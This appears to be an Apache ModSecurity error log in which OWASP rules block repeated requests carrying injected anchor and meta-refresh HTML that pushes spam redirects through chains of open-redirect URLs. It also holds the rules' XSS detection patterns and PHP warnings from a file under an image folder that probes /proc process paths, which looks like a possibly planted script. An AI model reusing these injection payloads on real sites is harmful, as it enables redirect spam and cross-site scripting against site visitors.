[Tue May 12 04:24:40.146834 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.i3s.unice.fr/describe/?url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>kampus bandung</a><meta http-equiv=refresh content=0;url=http://taxref.i3s.unice.fr/describe/?url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/v..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.147386 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https:..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.147629 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/ /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?do..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.147760 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/..."] [severity "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.148023 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://ju..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.148692 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.148958 2026] [security2:error] [pid 1808852:tid 1808868] [client 194.233.64.127:54171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaBfeipD4uoG21FocIwAAAA0"]
[Tue May 12 04:24:40.621343 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.i3s.unice.fr/describe/?url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>kampus bandung</a><meta http-equiv=refresh content=0;url=http://taxref.i3s.unice.fr/describe/?url=https://sso.upi.edu/cas/logout?service=https://juarez.gob.mx/v..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.622234 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https:..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.622702 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/ /> found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?do..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.622826 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/..."] [severity "C [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.623090 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https%3A%2F%Evolv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://juarez.gob.mx/visualizar_word.php?doc=https://warawiri.car.blog/2023/03/26/andil-perguruan-tinggi-dalam-mematangkan-sumber-daya-yang-handal/>Kampus Bandung</a><meta http-equiv=refresh content=0;url=http://taxref.I3s.Unice.fr/describe/?url=https://SSO.UPI.Edu/cas/logout?service=https://ju..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.623767 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:24:40.624041 2026] [security2:error] [pid 1709071:tid 1709108] [client 194.233.64.127:54185] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKPaLvMumyrWMfSu7rJQQAAANU"]
[Tue May 12 04:26:20.471473 2026] [autoindex:error] [pid 1709071:tid 1709098] [client 172.236.228.208:11090] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704433/task/1704433/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/task/1704433/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704433/task/1704433/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/task/1704433/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704433/task/1704433/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704433/task/1704433/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:27:13.213717 2026] [security2:error] [pid 1808852:tid 1808870] [client 43.164.197.117:48718] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agKQARfeipD4uoG21Foc-gAAAA8"]
PHP Warning:  filesize(): stat failed for /proc/689/task/689/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/689/task/689/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/689/task/689/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/689/task/689/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:27:20.916484 2026] [security2:error] [pid 1709071:tid 1709110] [client 43.134.178.104:48740] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/cafetiere/"] [unique_id "agKQCLvMumyrWMfSu7rKGQAAANc"]
[Tue May 12 04:27:28.496568 2026] [:error] [pid 1707624:tid 1707682] [client 119.111.230.12:50110] File does not exist: /home/nearoofr/public_html/xmlrpc.php
[Tue May 12 04:27:32.749473 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https:/olv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:32.749859 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:32.750018 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb /> found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:32.750129 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppS [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:32.750293 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/olv.E.L.U.Pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://pastein.ru/l/utb>10 kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
[Tue May 12 04:27:32.750648 2026] [security2:error] [pid 1808852:tid 1808876] [client 194.233.64.127:61681] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKQFBfeipD4uoG21FodEQAAABU"]
